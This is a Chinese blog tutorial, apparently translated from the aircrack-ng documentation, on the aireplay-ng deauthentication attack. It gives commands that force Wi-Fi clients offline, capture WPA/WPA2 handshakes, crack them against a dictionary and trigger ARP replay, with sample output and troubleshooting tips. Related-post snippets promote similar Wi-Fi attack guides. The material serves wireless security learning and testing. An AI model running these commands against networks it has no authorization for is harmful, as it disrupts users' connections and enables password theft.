Aircrack-ng之aireplay(Deauthentication)

最新推荐文章于 2023-12-05 12:17:57 发布
最新推荐文章于 2023-12-05 12:17:57 发布
阅读量7.8k 收藏 19
点赞数 6
分类专栏: Aircrack-ng 文章标签: aireplay Deauthenti

描述

Deauthentication,即解除认证攻击(aireplay-ng -0)。此攻击会给已连接上接入点的用户发送断开包(导致用户和接入点断开连接)。常在下列情形中用到:

  • 用来发现隐藏的ESSID
  • 用来捕捉WPA/WPA2握手包
  • 产生ARP请求(断开连接时,windows会刷新ARP缓存)

当然,没有用户和接入点连接时,这种攻击方式就不能使用了。

用法

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

其中:

  • -0表示解除认证攻击
  • 1是我们发送断开包的数量,0表示不断发送
  • -a 00:14:6C:7E:40:80是接入点的MAC地址
  • -c 00:0F:B5:34:30:30是我们所要攻击用户的MAC地址,如果此项被省略则攻击所有用户
  • ath0表示monitor接口

用法范例

典型的解除认证攻击

首先,选定一个已经连接上接入点的用户,我们在下面的命令中需要它的MAC地址:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D ath0

其中:

  • -0表示解除认证攻击
  • 1是我们发送断开包的数量
  • -a 00:14:6C:7E:40:80是接入点的MAC地址
  • -c 00:0F:B5:34:30:30是我们所要攻击用户的MAC地址
  • ath0表示monitor接口

应该会有下面的输出:

 12:35:25  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
 12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]

对于定向的解除认证攻击,aireplay-ng一次攻击中会发送128个数据包,64个发送到指定的用户,64个发送到接入点。

其中的“[ 61|63 ACKs]” 表示:

  • 【从客户端接收到的ACKs | 从接入点接收到的ACKs】
  • 可以看到两者的数量都比64要小,这是因为丢失一些数据包是很正常的。相反,如果客户端正和接入点频繁地通信,这些数也可能比64要大
  • 这两个数字可以帮助我们判断用户和接入点是否接收到了我们发送的断开包,0可以说明用户或者接入点没有接收到,比较小的数则说明与它们的距离较远,信号强度较弱。

用Atheros捕捉到的WPA/WPA2握手包

airmon-ng start ath0
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0  (switch to another console)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
(wait for a few seconds)
aircrack-ng -w /path/to/dictionary out.cap

对上面命令的解释:

airodump-ng -c 6 –bssid 00:14:6C:7E:40:80 -w out ath0

其中:

  • -c 6表示监听的信道
  • –bssid 00:14:6C:7E:40:80限定只从此接入点捕捉数据包
  • -w out表示存放数据包的文件名前缀
  • ath0是monitor接口名
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0

其中:

  • -0表示解除认证攻击
  • 5是我们发送断开包的数量
  • -a 00:14:6C:7E:40:80是接入点的MAC地址
  • -c 00:0F:B5:34:30:30是我们所要攻击用户的MAC地址
  • ath0表示monitor接口

此命令后应该会输出:

 12:55:56  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:56  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:57  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:58  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:58  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]

使用Prism网卡产生ARP请求

airmon-ng start wlan0
airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0  (switch to another console)
aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

在发动解除认证攻击以后,我们开始使用-3模式监听ARP请求。其中的-h选项是强制的,表示连接客户端的MAC地址。

用法指导

  • 指定一个特定的客户端,攻击效率会更高。
  • 解除认证包会直接从我们的电脑发送到客户端,所以我们必须和客户端离得足够的近,以使得数据包能被成功传送

常见问题及解决方法

为什么deauthentication不能正常进行

  • 我们距离客户端太远。我们需要足够的传送功率将数据包发送给客户端。事实上,每一个发送出去的数据包都应该有一个“ack”被包发送回来,如果ack数为0,则表明客户端没有接收到
  • 无线网卡工作在特定的模式下,如b、g、n等。如果我们的网卡和客户端网卡处于不同的模式,那么客户端就不能接收到我们发送的数据包
  • 有些客户端会忽视广播的数据包,这时我们需要定向发送解除认证包
  • 客户端重新连接的速度太快,我们没有注意到他们被断开过。
HoukChen
关注
  • 6
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
空口协议deauth讲解
weixin_47456647的博客
03-02 990
空口协议deauth讲解
无线安全及Aircrack-ng for windows教程.docx
06-13
无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx
WiFi Deauth 攻击演示分析 // mdk4 // aireplay-ng// Kali // wireshark //
ROSEBUD7_K的博客
08-09 2800
取消认证攻击是最简单的攻击手段之一,但破坏性奇高,可以轻易让无线网络环境瘫痪。
Aireplay-ng 的 6 种攻击模式详解
leiman1986的专栏
03-31 4396
Aireplay-ng 的 6 种攻击模式详解 -0 Deautenticate 冲突模式 使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效 ARPrequest。 如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3也无法产生有效 ARP request。所以此时需要用-0 攻击模式配合,-3 攻击才会被立刻激活
无线渗透学习笔记2
qq_42765117的博客
01-27 2787
无线渗透测试工具mdk3、reaver的使用
Aireplay-ng的6种攻击模式详解
linuxshadow的专栏
02-09 6942
Aireplay-ng的6种攻击模式详解
监听、扫描、抓包、跑包、aireplay断网攻击
小能猫的博客
06-28 3257
1.使用airmon-ng命令检查网卡是否支持监听模式 root@kali:~# airmon-ng 2.开启无线网卡的监听模式 root@kali:~# airmon-ng start wlan0 3.开启监听模式之后,无线接口wlan0变成了wlan0mon,可以使用ifconfig命令查看 4.扫描环境中的WiFi网络 root@kali:~# airodump-ng wlan0mon 当搜索到我们想要破解的WiFi热点时可以 Ctrl+C 停止搜索。 5.抓取握手包 使用网卡的监听模式抓取周围的无线
解决Aireplay-ng信道问题
大学霸__IT达人
04-23 5458
解决Aireplay-ng信道问题 Aireplay-ng是一个注入帧的工具,支持10种攻击类型,如解除认证攻击、伪造认证攻击、ARP请求包重放攻击等。大学霸IT达人当用户使用Aircrack-ng攻击实施密码暴破时,通常会使用Aireplay-ng来实施攻击,以加快捕获数据包的速度。例如,当实施WEP破解时,通常使用Aireplay-ng实施ARP请求包重放攻击,来加快捕获数据包。通常情况下,会...
kali攻击WiFi教程(仅供学习)
nlj1860453的博客
12-05 1597
2、插入USB无线网卡,再输入“iwconfig”查看是否有无线网卡“wlan0”,如果没有,点击“虚拟机”--“可移动设备”--然后点以“R”开头的按钮--“连接”输入“aireplay-ng --bssid 攻击的WiFi的MAC -c 信道 -0 攻击次数 wlan0mon”开始攻击,WiFi下面所有连接它的人都掉线了。3、输入“airmon-ng start wlan0”开启监听,如果提示“有两个可能报错的进程”那就输入“airmon-ng check kill”杀死进程。
无线攻击 --aircrack-ng套件之一:Aireplay-NG(将数据包注入无线网络生成流量工具 / 解除认证DOS攻击,强制用户二次身份验证)
Kevin's Blog
03-05 4515
文章目录一、用法概述二、命令格式三、用法示例3.1 注入质量测试3.2 强制取消用户身份验证攻击3.3 虚假身份验证 一、用法概述   aireplay-ng是aircrack-ng的套件之一,用于注入无线帧,主要作用是产生流量,以便后续用aircrack-ng来对WPA-PSK进行破解,Aireplay-ng有许多攻击可以解除无线客户端的攻击,以捕获WPA握手数据,虚假身份认证,交互式数据包重放...
aircrack-ng-1.1.rar
08-09
最近想着用aircrack-ng学习如何破解wifi密码,可是Linux中,必须下载代码使用makeFile编译后进行安装,才能继续下一步,而且网络下载的源码貌似编译不过,各种问题,也可能是我的系统版本比较旧(Ubuntu 18.04.2),经历重重困难,中原编译通过,感兴趣的小伙伴欢迎来取。
Windows系统下运行aircrack-ng
06-30
aircrack-ng V1.6现支持在Windows系统下运行,可以通过CMD输入命令方式破解无线网络,或通过aircrack-ng GUI图形界面对无线进行破解
aircrack-ng-1.6.tar.gz
03-16
aircrack-ng软件,从https://aircrack-ng.org/doku.php?id=Main官网下载。支持在linux上编译安装。
aircrack-ng-1.6-win.zip
04-09
aircrack-ng-1.6-win.zip
Aircrack-ng.rar_aircrack-ng _hack
07-14
eaisiest way to hack any wifi
WIFI系列协议--802.11s--Mesh网络
香蕉一号
06-15 8406
WIFI系列协议--802.11s--Mesh网络1.概述2.定义 1.概述 定义无线多跳通信支持无线LAN网格拓扑所必需的MAC过程。 2.定义 名称 说明 basic service set (BSS)
kali无线渗透之aireplay-ng
含笑
05-01 9752
主要功能是产生交通aircrack-ng以后使用的破解WEP和WPA-PSK钥匙。有不同的攻击可能导致deauthentications捕捉WPA握手数据的目的,假冒认证、交互式数据包回放,手工ARP请求注入和广播ARP请求回注。与packetforge-ng工具可以创建任意帧。 这是aireplay的官网:http://www.aircrack-ng.org/doku.php?id=airepl
Aircrack-ng学习笔记(三)WEP攻击
学无止境
05-20 953
WEP破解全部需要首先伪造认证,以便与AP进行正常通信 不产生arp数据包 aireplay-ng -1 0 -e kifi <AP MAC> -h <YOUR MAC> <INTERFACE> Aireplay-ng -1 60 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <YOUR MAC&g...
kali破解WiFi
李木一的博客
03-05 632
仅仅是做个笔记airmon-ng start wlan0(启动网卡监听模式)启动后ifconfig查看一下,如果网卡名加上了mon后则成功,(wlan0mon)airodump-ng wlan0mon  (airodump-ng后接网卡名,去扫面周围wifi的信息,ctrl+c停止)简单看下参数: BSSID:路由的MAC地址。 PWR:信号强度,越小信号越强。 #Data:传输的数据,大的可能在...
termux+aircrack-ng
最新发布
01-15
在Termux上使用aircrack-ng进行无线网络渗透测试是可行的。下面是一些步骤来安装和使用aircrack-ng: 1. 首先,确保你的设备已经root或者已经安装了Termux应用。 2. 打开Termux应用,并执行以下命令来更新软件包列表: ```shell pkg update ``` 3. 安装必要的软件包,包括git和wget: ```shell pkg install git wget ``` 4. 下载aircrack-ng的源代码: ```shell git clone https://github.com/aircrack-ng/aircrack-ng.git ``` 5. 进入下载的目录: ```shell cd aircrack-ng ``` 6. 编译和安装aircrack-ng: ```shell make make install ``` 7. 安装依赖库: ```shell apt install libnl-dev ``` 8. 现在,你可以使用aircrack-ng来执行无线网络渗透测试了。例如,你可以使用以下命令来查找附近的无线网络: ```shell airodump-ng wlan0 ``` 请注意,Termux上的aircrack-ng可能不支持所有的无线网卡。在使用之前,请确保你的无线网卡在Termux上是兼容的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值